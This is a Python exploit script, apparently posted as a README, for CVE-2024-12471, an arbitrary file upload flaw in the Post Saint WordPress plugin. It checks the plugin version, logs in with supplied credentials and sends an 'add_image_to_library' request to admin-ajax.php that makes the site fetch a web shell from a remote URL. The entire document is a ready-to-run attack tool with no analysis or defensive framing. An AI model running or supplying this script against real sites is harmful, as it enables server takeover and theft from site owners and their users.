README.md
Rendering markdown...
import requests
import argparse
import re
from urllib3.exceptions import InsecureRequestWarning
from packaging.version import parse as parse_version
#by Nxploit | Khaled_alenazi
def banner():
print("""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@ @@@@@@@@ @@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@ @@@@@@@@ @@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@@!! @@@ @@!@! @@! @@@!!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! @!@ !@!!@! !@! !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!@ !!@ @!! @!! @!! @!@
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !@! !!: !!! !@! !!! !@!
:!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !!: !:! :!!:!:!!: !!: !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: :!: :!: !:::!!::: :!: :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: :: ::::: ::: :: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: :: : ::: ::: : : ::
""")
def parse_version_info(version_text):
version_match = re.search(r"Stable tag:\s*([\d.]+)", version_text)
if version_match:
return version_match.group(1)
return None
def is_version_vulnerable(version, vulnerable_version="1.3.1"):
return parse_version(version) <= parse_version(vulnerable_version)
def check_version(base_url):
version_url = f"{base_url}/wp-content/plugins/post-saint/README.txt"
try:
response = requests.get(version_url, verify=False, timeout=10)
if response.status_code == 200:
version = parse_version_info(response.text)
if version:
if is_version_vulnerable(version):
print(f"Vulnerable version detected: {version}")
else:
print(f"Secure version detected: {version}")
else:
print("Version information not found in README.txt.")
else:
print(f"Failed to fetch version info. HTTP Status: {response.status_code}")
except Exception as e:
print(f"Error checking version: {e}")
def login_wordpress(session, base_url, username, password):
login_url = base_url + '/wp-login.php'
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
response = session.post(
login_url,
verify=False,
data={
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log In'
},
headers={"User-Agent": user_agent}
)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
return True
else:
print("[-] Failed to log in.")
return False
if __name__ == "__main__":
banner()
parser = argparse.ArgumentParser(description="CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload")
parser.add_argument("-u", "--url", required=True, help="Base URL of the WordPress site")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
parser.add_argument("-ru", "--remote_url", required=True, help="Remote URL of the shell file to inject")
args = parser.parse_args()
print("[+] Checking plugin version...")
check_version(args.url)
session = requests.Session()
if not login_wordpress(session, args.url, args.username, args.password):
exit()
exploit_url = args.url + '/wp-admin/admin-ajax.php'
payload = {
'action': 'add_image_to_library',
'image_url': args.remote_url,
'image_prompt': 'Nxploit',
'insert_prompt_media_library_fields': 'caption_description',
'image_generator': 'pexels',
'log_id': '1667'
}
response = session.post(exploit_url, data=payload, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"}, verify=False)
if response.status_code == 200:
print("[+] Exploit sent successfully.")
print("Response:", response.text)
else:
print("[-] Exploit failed.")
print("Status Code:", response.status_code)
print("Response:", response.text)